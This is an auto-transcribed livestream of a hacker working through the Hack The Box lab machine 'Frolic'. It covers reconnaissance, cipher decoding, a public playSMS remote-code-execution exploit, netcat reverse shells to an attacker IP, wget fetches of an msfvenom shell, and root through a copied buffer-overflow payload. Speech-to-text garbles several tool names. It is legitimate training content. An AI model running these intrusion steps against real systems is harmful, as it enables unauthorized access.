Let's log into the print share. See if we can get anything from that. Access denied. All right. Let's try that again, but instead of print, we will do IPC. IPC is generally nothing there, but nothing there. I'm not seeing anything on SMB. I need to know what 1880 is and what 9999 is. I feel like the juice is in these two ports. Right here. But I don't know what these are. Till this port scan's done. Oh, Nixon, I missed your message earlier, but yeah, I always play another machine. I usually make these streams 4 hours long, give or take about a half hour. So the fact that the streams have only been going on for an hour and 50 so far is, if we get this one done fast, then we will do a third machine. Sometimes I do 3 machines in one stream. On average, I do 2 on average. Sometimes I only do 1. Sometimes most of the time I do 2, and then on 2 separate occasions I've done 3. So on 2 separate occasions I've done 2, on 2 separate occasions I've done 3, and then the rest of the time it's always been at least 2. There we go. Nmap's done. What have we got going on over here? Looks like 9999 is a web server running Nginx. Possible admin folder. That looks really good. That looks really fine and dandy. SMB Vuln. Reg service DOS. I don't care about DOS. What's this other port here? 1880 is a node.js. Really no information about that. It says HTTP. Well, let's open up the browser. We should have done that a long time ago, actually. Let's do 4 nines. This colon 1 2 3 4 4 nines. Welcome to Nginx. All right. Well, we had a /admin here, so let's do /admin. Here's a come on, I'm hackable. Whoa, that's a nit. That's a no, nothing. Is it admin blank password? You have 2 attempts. You have left 2 attempts. Oh gosh. What happens if I lock it out? VSAT isn't satellite? That's interesting, right? I don't know. Oh, I don't know, man. Should I just do admin password? You have 1 attempt left. I don't know what to do. On the previous page? Oh yeah, oh, thank you for using Nginx. HTTP Frolic HTTP 180. Let's add that to my Etsy host. Inspect the code. Let's add this to Etsy host here. Node red. Username and password login. Let's look up node red. Default creds. Try admin password. See what happens. Why not, right? We didn't expect the code. Let's try it. Go back one. No. No, nothing. Password, name, password, ID, password. Title, crack me? Is that what it says up here? Oh, it says crack me. Well, I don't know, man. It says one try left. How can I crack it if... I don't know, man. It says I got one try left. What if that's just smoke and mirrors, you know what I mean? What if that's just a fake? But if I lock it out, then I gotta revert the machine. What kind of web server is it? I don't know. It's an Nginx server. Let's go to network, and we want to... Yeah, left 0 attempts. What happens if I refresh? Oh, you get 3 attempts. Oh. It doesn't pop up my request. I think I have to brute force this with burp. I don't like brute force with burp, quite frankly. I think it's kind of awful. I think burp and cheer sucks. But looks like it's my only option. Come on, I'm hackable. What if it just what if it's SQL injection? It doesn't even send it to my... This is weird because it doesn't send it to my burp. It just gives me an alert here. No, nothing. Yeah. I can't even, there's not even a real request being sent here. So there's no way to actually crack it. But if we do... Hold on, guys. We gotta take a time out. My cat, he needs a pet. Got a return guest to the stream here. This is Met Cat. How you doing, bud? Yeah, I think this is a rabbit hole, dude. He's rubbing his face against the mic. Hey, you're on stream, bud. Just say something. You're a celebrity. Alright, he jumped off me. That was a good cat break there. You gotta get those in there every now and again. Alright, let's go back to what we were doing here. So, yeah, if we do view page source, crack me. Yeah, let's try it. Yeah, let's do it for Roxbuster. That's a good point. Why did I not? Well, my cat's distracted me, guys. I want a different Roxbuster command. We'll do... Well, I want a different word list, I mean. Actually, I think the word list by default is that one. Hold on. Let's try it. I think if I don't specify a word list, it gives me the one I like to use anyways. Let's do... What's the name of this box? We'll get rid of /admin because we know that's going to get found, I think. So we'll just do that. Cannot connect to the target. Well, that's because I put HTTP twice. We don't want to do that. Let's try that again. Let's see here. Yeah, see? Oh no, it does medium directories. Oh, that's not the one I like. It is. I mean, that's one of the ones I like. We got a /dev. We got a /test too. I forgot about the /test. Let's try that. /test. Hey, don't do that. Oh, look at there. Look at this. Look what we got here, dude. We got some juice. You're in the same box right now? It's an Ubuntu machine. We got a configuration file here. This program makes use of the Zen scripting engine. Zen Engine 3.0. I think this is a vulnerable version of XF. I think I've done this before. If I can get on the box, we might be able to take advantage of XF. I have a hunch that that's the vulnerable version. I don't know why, but 7's sticking out to me. I don't know why. But we'll see. Is this a hash? MySQL. Is this a hash? This looks like a hash to me. Is this a hash? JavaScript? Wait, what do you mean? What did I miss? I'm confused. Why are you guys yelling at me? Go back to the view page source. On which page? Is this a hash, dude? NL2VTC. The JS script, it's there. The crackable page. This one? Oh. Include source JS/login. You're talking about this one right here, this script? Variable to count number of attempts. Oh, super duper looper. Got me, bro. I'm sitting there. I thought I was gonna say super duper secret password, but then it said looper. Threw me up for a loop. See what I did there? Super duper looper password, lol. I can't believe I missed that. I'm glad you guys yelled at me. Whoa, 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 what do we got going on here? What the heck does this even mean? View page source. This has got to be something. Let's just copy this and put it in the CyberChef and just see let's see how this goes. Let's go to CyberChef. What is it? What could this be? Is this Morse code? What the heck is this? I don't know what this is. I don't care. Let's do magic. Let's throw magic up in here. Bake it up. Oh man. Some sort of alien language. Bro, I don't know what this is, but let's gonna go to ChatGPT with this one. Normally I don't like to use ChatGPT, but I don't know what else. I mean, this could be nothing, but it's worth a shot. All right, let's see what we got here. So, can you help me figure out what this means? We're just gonna paste it. Looks like a form of encoded message, probably using a pattern punctuation marks. Morse code. See, I thought it looked like Morse code. I can help you decode it systematically, but it would be good to know if there's any context in the message, like a known cipher method or hints. First day here, I'm loving this. I'm glad you're having fun. How do we... I don't know. I have no idea. I have no hints. I have no hints. Do your best, ChatGPT. I believe in you. See what happens. He comes back. He was like, the CIA master password is. I doubt this goes anywhere. I feel like this is a rabbit hole, but I don't know. We're gonna move this off the screen real quick while it's analyzing. When it's done analyzing, I'll let you guys know. It just got done, but it's giving me a bunch of text. It didn't give me anything useful, honestly. Alright, let's pull it back down. We could try different mappings for the characters. Bro, try everything you got. Try everything you can. Get me a result and don't stop until you get something useful. I don't know what the heck to say to this. I just tell it to do stuff and it does stuff. Yeah, I usually stream on YouTube, but my channel's on strike right now, and that's my main platform, by the way. So when we get back on YouTube, which will be Sunday, my strike will be over on Saturday, and my streams are Sunday and Thursdays. Sundays at noon Eastern time. That is 9 a.m. Pacific time. And Thursday I stream at 7 p.m. Eastern time, and that is 4 p.m. Pacific time. This doesn't look like they're giving me anything. The decoder results still largely unclear. I think it's a rabbit hole, guys. I really do. Maybe that password's used for somewhere else. So let's just use this password over here. Admin, yeah, let's just try that. See if it works over here. Login failed, nothing. Where's that page at? Right here. Success.html. What does that mean? Is this a rabbit hole, guy? Are there any other directories past the admin? That's a good point. That's a good question. There's loop. Backup loop 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 loop. Loop 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 loop. Well, let's see what is it. Is it after admin? No, it's not after admin. Let's just try. Is there anything here? Loop. A padding disable Chrome friendly error. Loop. Loop. Same thing. Loop. Well, that's gotta be a rabbit hole. We go to dev already? I don't think I went to dev yet, guys. Dev. Forbidden. Alright. Let's check out backup. Oh. Oh. I didn't check the backup yet. Password.txt.user.txt loop. Huh. Backup. Is this an LFI? I don't know. What's that mean? Backup password txt. Yeah, I don't know. I don't know what kind of cipher it is either. Well, let's try how? Alright, let's do a different word list here. Check backup / loop. Oh, there we go. Password.txt. That's a password. Let's go ahead and duplicate this. Well, we'll just put this in my notes. Password. I'm not human. We gotta figure out where to use that at. But we also had a user txt here too. User admin. Oh, okay. So it's admin. Admin. I'm not human. Let's try that over here. I'm not human. Login fail. The gibberish is some kind of robot letters. That makes a lot of sense. Maybe, not really. Maybe a little bit. Well, we have to figure out where to use this password at. Check the username.txt. I just did. Your stream might be a little bit delayed, but I just did. Is there really that much delay in the stream? That's kind of crazy. Check the other text files. Like what? I only see user and password. We got both of those. I mean, there's loop. I don't know what txt files you're talking about. Let's do this. I'm gonna go ahead and cancel this. I think Frolic Join did its job over here enough. What was in user.txt? It was admin. Like, it gave me a username of admin. Well, we can also log in as an admin, maybe as let's try that. SSH admin at frolic.hackthebox. Cannot find what? Frolic. Oh, it's Frolic? Did I spell that wrong? Frolic. Oh, I think I spelled it wrong. Or no, maybe they spelled it wrong. Yeah, they definitely did. Because I copy and pasted that. SH frolic.hackthebox. Oh, I wanted to log in as admin, not as root. Let's go ahead and cancel that. Because there could be an admin user, and admin user is not necessarily the root user, you know what I mean? That didn't work. Wonder where that password goes to. That's what we need to figure out. Doesn't go there. No, it's Frolic. See, when I went to... When you go to /admin... I don't want to view the source. Where did we see that at? Maybe it's just on... Yeah. See? Thank you for using NG Frolic. That's how they spelled it. So that's why I did that. Like that. Frolic. They spelled it wrong here. So that's why I did like that. Frolic.hackthebox. Let's do view page source on this. Oh goodness. Node red. Node red. I don't have the username and password for this. Let's see here. Do we see anything interesting on this? Red images, red vendor ace. The host name says Frolic here. I think they just spelled it wrong on their thing, but it don't really matter how it's spelled. Maybe Google search on decode and snippet of that word looking text. I don't know how that would be possible. Maybe we can log in as admin on the SMB. You know what I mean? that could be the way. This username and password's gotta go to somewhere, right? They wouldn't just give me that for no reason. So let's try on the SMB client here. Password, I'm not human. That looks like it worked. But we don't see any other share. So we can access the print share now, because before we had access denied. So now let's see if we can might be able to read our particular thing in the print here. So we would do admin target IP address. Yeah, let us log into admin. So that password works there. The share is print $, and we will enter. Let's do the password. Access denied. Okay. That gibberish is where everything is. Yeah, all right. You might be right. You might be right. Where is it? Where'd it go? Man, I got too many things going on. We're gonna close all this. I forget the password for this. What if we tried this? What if I tried this other password that I found here? Just, I doubt this is gonna do anything, but yeah, I didn't do anything. All right, that would have been interesting if this second password did something else. Login successfully. All right. Well, darn. Google search how to decode this. I mean, it's worth a shot, but I'm not. My hopes are not high here. Decode. Boot programming language. Execute. Decode ook. Is that? I don't know what the heck. Was it right up? Google Ook decoder. Just give this a ChatGPT, maybe? It may be. Thanks for the suggestion. I think could potentially these are both. I start getting the search of the input. Go back to it. All right, we'll let ChatGPT do its thing over here. You're saying go to this one? Ook. It's not doing nothing though. Interpreter. It's not doing nothing. I hit execute. Nothing here. Check. Oh. All right. That's what it is. It's such gibberish to me. Well, let's slash whatever that is. Ah, we got more weird stuff. I don't know what this is. This works. This is a thing. So we made some progress here. Now we just got to figure out what this is. Let's do some Cyber Chef again. See what happens. Put magic on it, maybe. I don't know what. Is this base 64? Ook binary. I jinxed it when I said I hope this isn't a brain scratcher. Honestly. We gotta figure out what this is. Well, let's just try the same strategies. Go. We'll just go to Google and put decode whatever that is. What's it doing? Processing? Is this a hash? CRC32 hash? Is this what I gave it? Reverse hash value? Is that exactly what I gave it? It just kind of did it automatically. CRC32. CRC32 cracker. I don't know. Decode. Okay, well, is this the same as that? So UESDD or UESDBB? Yeah, I don't know. What's this go to? Is this a password or something? So AJH, welcome to the stream. Thanks for hopping in. How you doing? Not too bad. That's good to hear. Is this a password? Login failed. How do I crack? Let's do change directory, hack the box, make directory, Frolic, change directory, Frolic, nano, hash.txt. We'll just paste that hash in there, see what happens. And then we will do John, hash.txt, see if we can crack it. No, it doesn't detect it as a hash. So we have CRC32 hash. What is a CRC32 hash used for? What is a CRC32 hash? Well, let's go to hashes.com. See if it pops up here. KAV33J. See if we can identify it. I don't know what to do with this, dude. It's gotta mean something. Oh, here we go. Is this an MD5 hash? Can I convert it to an MD5 hash? No, I don't think that really does anything. CRC32 hash. Wish I knew what a CRC32 hash was, what came into play. Put it in CyberChef, throw it as magic, and see if we can get anything. From base 64, from hack. I don't know, man. Decode this. See if we can get. Analyze. Paste bin link. XOR cipher. Is it a Caesar cipher? Let's ask ChatGPT. I have a CRC32 hash. Oh. Try that site. All right, let me get my okay, now we got a different thing. Let's see if it's double. Output is this. Is it just an infinite loop? Bro, I have no idea what's going on right now. Use from base64 and plug in the gibberish in from the website. Didn't I already try that? This gibberish? I could have sworn I already tried that. It didn't look like base64, so from base64? Yeah. Whoa, there's index.php. We're getting something out of this. Index.php. The rest of this is gibberish to me, though. Let's ask ChatGPT what this is. No, what the heck? Base64 encoded string. I didn't get nothing from base64 though. Let ChatGPT think. It appears to be a zip file. ChatGPT just gave me a zip file. Let me open this up real quick. And it's a zip file that's password protected. Password's not right. Let's try the other password that we have. Nothing. It's password protected. I don't have a password for it. Yeah, ChatGPT gets spit out a zip file called index.php. Well, I unzipped it, and then inside of it is index.php. Let's see if we can try a common password. It's not, no, the zip file wasn't protected. It's the file itself. The file itself is password protected. Let's try password. Oh, well, password actually worked. And then I got this. So this is what I got, guys. ChatGPT gave me a zip file. I opened it up. It said index.php. And then it gave me this. So we gotta figure out what this is. From base 64. Okay. I'm just gonna ask ChatGPT what this is again. This is hard, man. I don't know. Without ChatGPT, I might have been a little lost today. Inside that zip file, I had a index.php file with this. What is this? It's another basic. Why does it not work in CyberShell though? Yeah, decode it. This is an easy box? Yeah. Yeah. I don't understand why CyberChef isn't decoding. Like, ChatGPT keeps saying that, yeah, it's base 64, but every time I do from base 64, it doesn't work. See? It just gave me more of this. It gave me another file, ChatGPT did. It just gave me this. So I decoded it again. ChatGPT gave me another file, and it gave me this. And it says index.php right inside there. I don't know, man. This is weird. Try from the command line. File name too long. Nano code.txt. It's base 64 -d, I think. It's giving the same results. Nothing here. Dude, I don't know. I'm stuck. This is a weird box, dude. I'm out of ideas. Open with Notepad. Well, I'll just copy and paste this. I told ChatGPT what it gave me. I don't know. Maybe it has an idea. This is really annoying. Inside that file you just gave me was this. What does this mean? ChatGPT said it might be hexed. What might be hexed? He gave me this. What does this mean? Put this in a hex? I should have tried that. ChatGPT was wrong. From hex dump? Oh no, not from hex dump. From hex. This looks like base 64. So, from base 64. Alright, from hex. Go back to that. Like this one? This is something here. Bro, what the heck is this? Ask ChatGPT. Yeah, I try to keep this stream PG-13, guys. Unfortunately, I just couldn't this time. So I put this in ChatGPT. So this is brainfuck code, according to ChatGPT, and it decoded to IDK what is pass. That's really all it was, dude. Let's try. Can we log into this now? No. Let's look up brainfuck decoder. IDK what is pass? That's a password, right? That has to be a password. Huh. What? Where does pass go? It doesn't go here. Unless it's... root. We can do /red. Can I get /red? This is crazy. This is wild. I've never seen anything like this. I've, like so many different little ciphers, So that's Could it be an SSH password? I did check dev. I can't remember what was on there, but there was nothing there when we checked. I'm actually gonna copy this for later, in case I forget it. Oh, not that. Not sev. Dev. Yeah, dev's forbidden. Well, it could be like an SSH login, but we don't have a username though that goes with that. /play SMS. See if that does anything. Oh. Oh my gosh, bro. Is this the password? Does this go here? Dude, this is... Hey, we logged in, dude! We got into play SMS with that one. We did a thing. Alright, now we gotta figure out what's in here. My account. Can we make commands? Settings. Can I get some command execution on this? View SMS queue. View future messages. My sent messages. View credit transactions. My report. Nothing. All this is empty. All inbox. Nothing. All feature messages. All sent messages. Did I look in there? Sandbox. Not see nothing there. Report all users. There's only one user, admin. Report ban users. Report who's online. It's just admin, which is me. Alright. View log. Alright. SID. Admin. SID. That looks interesting, right? That's gotta be it, bro. Can we log in with an SID, right? There's multiple ones in here. How do I find that? I got logged into Play SMS. And then I went to Reports, View Log. There's more than one though. Admin, status, SID. There's multiple SIDs here. Valid ID. So this is my IP address. But this is the target IP address. So this and up. So this and up is stuff that was here. I don't know if the SID is going to do anything. I'm going to copy this and put my notes. I don't know if we can come back to that later. See if there's anything else in here. Group inbox. Manage auto. Manage board. If the SID was the same every time, then I would probably try to do something with that. Yeah, it's in dev/backup. Add SMS command. Oh. That's what we need. Command execution. Anywhere to upload a shell? Maybe. Command has been added. Keyword, who am I? How do I run commands? Manage command. How do I run it though? Edit. How you find the dev backup? Where is my... Right here for Roxbuster. With this word list right here, the dirbuster directory list 2.3 medium txt. How do I run this command? It looks like might be able to run a command. Settings, route incoming SMS, main configuration, manage firewall, simulate incoming SMS, features, manage poll, manage quiz. Well, let's just look this up. There's got to be a written something about it, right? Play SMS code execution. There's got to be something around here. Authenticated RCE. Simple method on performing remote execution through the phone book CVS upload issue as described on exploit.db. Well, let's just run this. This looks like it's gonna work. We can manually exploit it, or we can just grab this guy's code and run it. There's a version of that, Vaughn? Yeah, you're right. I don't think we have a version number on mine. I mean, let's just try it. What's the worst that can happen? I get malware on my computer. That is the actual worst that could happen. Just my VM though. It's sandbox. It isn't gonna spread the rest of my network though. I can always nuke my sandbox and then start over. There's Metasploit modules here. We don't want to use Metasploit. We're gonna try not to do it. Metasploit SQL injection. So there's no way to manually do this except for, well, I don't know if this is considered, this is an automated script, but it's not Metasploit. Play. So how does this guy run this? He runs it like this. Alright, so exploit.py URL. That's a good question. What is the URL? We're like so far in right now. Password is, I don't know what is pass. Let's see if this works. We're data. We got a show. Let's do change directory / home. This is a weird shell. This isn't like it's this isn't like it's a Unix, you know what I mean? Like it's like kind of weird. There's no way this is an easy box. This is a lot of steps. I think the privilege escalation is going to be incredibly easy because this has been hard. It says we're in var. It says var www.html plate. Why can't I change directories here? We need a better shell, you're right. No, this is I just can't change directory. We just need a better shell. Let's make one. Easy. Let's make a better shell. We'll do a netcat-lmvp443, and we will go to rev shells. What's my IP address? 10.10.16.2. We will copy this, run this. That did not work. 16.2. Why did that not work? I need a better shell. I can't, because I can't change directories. But we can do stuff. Yeah, see, we can execute commands. We need a way to I thought this would get us. It might have Python. Let's look. Let's see if we can stabilize it with this. Dang it, that did not work. Well, let's try that again. Well, we're gonna make a reverse shell right here with MSF Venom. And then we're gonna transfer it, then we're gonna call it. And then that should give us a reverse shell, maybe. wget http://10.10.16.2/shell. That worked. ls. There's a shell. Alright, perfect. Now, netcat-lmvp443, and then we will chmod plus x shell, and then we'll execute shell. And that didn't work. Very unfortunate, very unfortunate. How do we have code execution. We downloaded shell, but it didn't run shell. Let's just try a bunch of different rub shells. I have a bunch here. We have a bunch. Oh, okay, that's not gonna work. I can't backspace. I have one right here. This is from the last box. Port 443 IP is 10.10.16.2. Yeah, that worked. Perfect. Okay, we just gotta set the X term here. Just gotta stabilize this bad boy, and we're off to the races here. Alright, so let's do change directory / home. Change directory AY. I don't have tab autocomplete. We want to do that. Control V. Oh man, I made my show worse. Ah, gross. I made it worse, guys. I got the user flag, but my shell looks so gross right now. That was a big user flag. Like, that was a lot of steps. I've never seen so many steps on an easy box, I don't think. That was a lot of steps. I'm going to go medium on that. That was a medium level type of thing. Alright, well, we got to figure out how to escalate our privileges. Let's do a sudo -l. No TTY present. Well, let's try this. Let's do a netcat. Let's try this again. Change directory. What was it in? It was in... Oh gosh. It was var something, right? Can I rewind my own stream here? Change directory dub. Change directory HTML. There we go. Change directory. There's an admin. This looks gross. There's an admin directory here. Success. No. Change directory. What? This looks so gross. It was var something, right? Change directory var. What was it? Var. You know what? Why am I even looking for it? I can just transfer it again. This is so gross looking. Let's do change directory /tmp. And then we will do on my other terminal here, we will do Python 3-m HTTP server wget HTTP ://10.10.16.2 dot or slash what we call it, shell. That should work. We should have a shell in my maybe no 404 not found. It's shell's not in here. Change directory home. Let's try that again. Status 200. Now we should have a file called shell. Chmod +x shell. Then we can do netcat -lmvp 443, and then we can run shell. Can I execute binary file exec formatter? Well, that's gross. Can I execute binary file execute format error? I don't want to lose my shell, but I need to make it more usable. Can I do sudo-l? No TTY present. Limpies time? No, it's not Limpies time. It's time to get a shell that looks like a shell or like better. I messed it up. I shouldn't have went for the tab autocomplete. Usually when you go for the tab autocomplete, you mess it up like this, and it looks like weird old junky like this. So what we're gonna do is we need to figure out how to get another shell. Well, that's okay. We'll just do this. We'll just take the same command here, paste it. There we go. Perfect. Now it looks somewhat normal. Well, it does look normal. If I just do this, well, let's do Python 3. I didn't do the Python 3 last time, so I can clear sudo-l. Password for data. We don't have it. We can try the passwords that we've been finding on the box. See if any of these work. One of these might work. That didn't work. I'm not human. Shell inception. I got shells and shells and shells. It's like my 3rd level. We're 3 levels deep in shells. Alright, we got one more try. Well, we can try as many times as we want, but this is the other password I got. None of those worked. Alright, well, darn. I guess it's Limpies time, right? No, it's not yet. It's not yet. There's one thing we gotta check. Remember we saw exif tool? And I'm telling you, I've exploited exif tool before, and I don't know, that 7 just seems like one of the ones. Let's go to hacking notes. And let's go to privilege escalation. And let's go to Linux. And let's go to, where's it at? I want to list all my SUID binaries. I might have passed it. Oh, here we go. Yep. SUID binaries. Or bits. Let's do GTFO bins. And we will make this smaller. So we gotta do we have to look at this while we're typing. Get the full list here. Alright. Matter of fact, oh, we'll keep that shell just in case. Alright, so let's look for mount. No, ping f user mount, that doesn't work. NTFS? Nope. Dot binary? No. ROP? Maybe? No. New UID map? No. PK exec? We don't have sudo on it though. We have SUID. Maybe at? We don't have that. Sudo. Sudo never works. Nope. The home ls/la star. Doesn't node red. SAHAY. Node red looks interesting, right? If I can get a password for node red, then I can log into that and maybe get some other information out of that. Credentials, admin, passwords. Look at that. So if we can crack this, then we can log into node red and maybe node red will give us something else. Let's go ahead and copy that. We're going to make up a new nano hash.txt. Get rid of that. Put this. John. See if John cracks that. No password hash is loaded. What do you mean, cat hash.txt? Oh, because we gotta have a dot. There's a period at the end of that. That can't be right. Admin password? That's not right. We tried that. Why is this taking so long? You said AUS has binary permissions? There's a password too, but these are all the same. I think it's like a default password and I changed it. What do you mean by the user has binary permissions? I'm not sure. I'm not sure what you mean. Yeah, I'm getting tired, guys. Let's do line piece. Well, the stream's almost over. Ideally, as soon as this box is done, the stream's over. Ideally in 20 minutes to a half hour. But we're gonna stay up until we get this done. I feel like we're on a cusp. We just got to run one piece here. Keep that show alive just in case I need it. 10.16.2 slash linpeas.sh. Mod plus x linpeas.sh slash linpeas.sh. These kernel exploits hardly ever work on Hack the Box, so I'm not going to try this until last. Made this mistake of trying it too much. Oh gosh. Skip me down, way down. This looks interesting. What's that? This right here? No clear TTY1 Linux. S-bin Ageti. I don't know what that is, dude. That's not what I wanted. System administration command, the Linux version of Getty. Set terminal type, port, file, host name. It looks like a session. If we can exploit that on my root, then we can get root, right? Yeah, absolutely. But we don't know if we can exploit this. This looks like it's a session. No clear. Can I attach to myself to this session somehow? Similar to what we did with the Tmux a few boxes ago. /home.binary. Where's that at? Alright, we'll go there. ROP. What the heck is ROP? ROP's on here. Let's do if ROP privilege escalation. Kernel ROPing your way. ROP return oriented programming. Is that a file? It's Linux. Everything's a file. Try running it. I guess we could just try running it, huh? Usage program message. I don't know what that means. Huh. Well, let's look at hat tricks. Your hat tricks always has good stuff. Message sent. To send messages? I don't understand what that means. Message sent. I can send messages. What does that even mean, though? What does that do? It's outputting that string. I don't know what you mean by that. What do you, how do you know it's outputting the string? It just says message sent. Like, where's it going to? Binary exploitation. I don't know what to try. It's a PGP signature. I don't think that's anything useful. Could be wrong though. T-Mux. Don't tell me that's some kind of buffer overflow. Bro, this is a buffer overflow. This would be not an easy machine, I don't think. Oh, this one's exhausting. What do you guys think? We're running out of time here. Maybe better to use, maybe, wait, who used guided mode? Yeah, I'm gonna resort to guided mode. We're running out of time, guys. Ain't no way this is an easy box. I don't think it is either. So guided mode. What is a full path SUID binary that is owned by root? Was it the ROP? Is ROP? SUID binary owned by root. We did look at SUID binaries, but we didn't see one that was owned by root, did I? I thought they were all owned by root. That's our hint. SUID binary that's owned by root. Here they are. The full path. Oh, this one. Is it the ROP? Whoa. Yeah, it's gotta be ROP. The ROP executable is vulnerable to buffer overflow. You were right, it is buffer overflow. How many bytes of junk should be put in the user field before the return address gets control over the EIP? Oh gosh. You were right, it is a buffer overflow. How do I know this though? How do I do this? Should be put in the user input before the return address to get control over the EIP. Brother. Let's close out all this. I don't have a debugger though, that's the problem. Oh yeah, there is one that's built in the Kali Linux. Bro, I don't feel like doing a buffer overflow. ROP buffer overflow exploit. It's gotta be like an auto exploit, right? Yeah, let's ask ChatGPT. Use a tool like GDP. Or GDB. Yeah, but how am I gonna debug it when it's not, like, if this isn't on my system, right? Yeah, GDB is not on the system. See, I don't have a debugger on the system. Let's look at the walkthrough. We're out of time. We're gonna go over 4 hours, unfortunately, but let's just go ahead and throw in the towel here. This is gonna take a long time if we don't look at the walkthrough. So this isn't an easy box. If I had more time, because I know how to use. Did it not? Did I download this? Frolic. Is that not a buffer overflow? But I'm just like, this is gonna take too long. This can be transferred from the attacking machine. Oh, we can actually download it? This is a horrible walkthrough. Let's look up snow scans right up here. Something that might be a little copy and pastable. Can I copy and paste this? To construct the final payload, we write a simple script that squashed the RIP register with the memory address. What's the payload? It says this isn't a bash history. What are we in the bash history for? Where's the buffer overflow at, bro? Why does he write so much about the bash history? Huh? Oh, that's beyond root. That's why. So this should work if I just copy and paste this. That seems like a cheating way, but man, I'm tired and I gotta get to bed, guys. I could have figured that out myself, but we're out of time today. Let's try that. ID, yeah, we're root now. All right. It's buffer overflow. Buffer overflows, in my opinion, take a lot of time. It depends, but yeah, we're about what are we on a recording? Yeah, we're almost sitting 4 hours. I try to keep these under 4 hours, so unfortunately, we just ran out of time today. I don't like to get them like that, but can't win them all. And I want to resume this on another stream. This should be a medium box. This should be a medium box, straight up. I must say it's a bit hard. This should have been a medium box. This one took forever, dude. There's a lot of steps to this. Like a lot of steps. That should have been a medium box. Yeah, everyone's rating it medium too. Look at that. See? That's what I wrote it at. Well. Well, we did it. Buffer overflow to root. Let's go ahead and we did get to the user flagged intended way. We did all this decoding nonsense. We definitely did it the intended way. At least we got the user flag without help. And then we realized it was a buffer overflow. We just didn't have time to exploit the buffer overflow. Alright, well, thanks for watching. Thanks for hanging out. Make sure you follow us if you haven't already. If you're watching this in the past broadcast on YouTube, subscribe if you're not already subscribed. And hopefully I'll see you in the next stream. Every Sunday, noon Eastern Time, 9 a.m. Pacific Time. Every Thursday, 7 p.m. Eastern Time, 4 p.m. Pacific Time. Hopefully I see you on the next stream. Check out my other content on YouTube. Check out my podcast, The Hacker's Cache. And thanks for watching. Thanks for supporting the channel. And I will see you in the next one.